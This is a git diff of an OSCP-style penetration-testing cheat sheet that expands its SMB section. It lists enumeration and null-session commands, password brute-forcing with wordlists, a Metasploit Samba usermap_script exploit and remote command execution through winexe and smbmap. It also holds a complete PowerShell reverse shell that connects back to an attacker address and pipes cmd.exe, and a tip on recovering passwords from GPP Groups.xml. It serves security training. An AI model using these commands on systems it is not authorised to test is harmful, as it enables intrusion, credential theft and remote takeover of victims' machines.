smb 139/445 update

oscp_human_guide.md

@@ -419,12 +419,73 @@ msf > use exploit/windows/dcerpc/ms03_026_dcom
 
 
 ```
-nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111
+# Enum hostname
+enum4linux -n 10.11.1.111
+nmblookup -A 10.11.1.111
+nmap --script=smb-enum* --script-args=unsafe=1 -T5 10.11.1.111
+
+# Get Version
+smbver.sh 10.11.1.111
+Msfconsole;use scanner/smb/smb_version
+ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' 
+smbclient -L \\\\10.11.1.111
+
+# Get Shares
+smbmap -H  10.11.1.111 -R <sharename>
+echo exit | smbclient -L \\\\10.11.1.111
+smbclient \\\\10.11.1.111\\<share>
+smbclient -L //10.11.1.111 -N
+nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111
+smbclient -L \\\\10.11.1.111\\
+
+# Check null sessions
+smbmap -H 10.11.1.111
+rpcclient -U "" -N 10.11.1.111
+smbclient //10.11.1.111/IPC$ -N
+
+# Exploit null sessions
+enum -s 10.11.1.111
+enum -U 10.11.1.111
+enum -P 10.11.1.111
+enum4linux -a 10.11.1.111
+/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111
+
+# Connect to username shares
+smbclient //10.11.1.111/share -U username
+
+# Connect to share anonymously
+smbclient \\\\10.11.1.111\\<share>
+smbclient //10.11.1.111/<share>
+smbclient //10.11.1.111/<share\ name>
+smbclient //10.11.1.111/<""share name"">
+rpcclient -U " " 10.11.1.111
+rpcclient -U " " -N 10.11.1.111
+
+# Check vulns
+nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.111
+
+# Check common security concerns
+msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_checks.rc
+
+# Extra validation
+msfconsole -r /usr/share/metasploit-framwork/scripts/resource/smb_validate.rc
+
+# Multi exploits
+msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost 10.11.1.111; run
 
+# Bruteforce login
+medusa -h 10.11.1.111 -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt 
+nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111  -vvvv
+nmap –script smb-brute 10.11.1.111
+
+# nmap smb enum & vuln 
+nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.111
 nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.111
 
-enum4linux -a 10.11.1.111
+# Mount smb volume linux
+mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share
 
+# rpcclient commands
 rpcclient -U "" 10.11.1.111
 	srvinfo
 	enumdomusers
@@ -433,24 +494,17 @@ rpcclient -U "" 10.11.1.111
 	netshareenum
 	netshareenumall
 
-smbclient -L 10.11.1.111
-smbclient //10.11.1.111/tmp
-smbclient \\\\10.11.1.111\\ipc$ -U john
-smbclient //10.11.1.111/ipc$ -U john  
-
+# Run cmd over smb from linux
 winexe -U username //10.11.1.111 "cmd.exe" --system
 
-smbtree 10.11.1.111
-
-nmblookup -A 10.11.1.111
-
-smbmap -u victim -p s3cr3t -H 10.11.1.111
-
-Inside \Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml can found user and passwrod, decrypt with "gpp-decrypt "
-
-Mount SMB in Linux:
+# smbmap
+smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum
+smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE
+smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing
+smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell
 
-mount -t cifs -o username=user,password=password //10.11.1.111/share /mnt/share
+# Check
+\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xml look for user&pass "gpp-decrypt "
 ```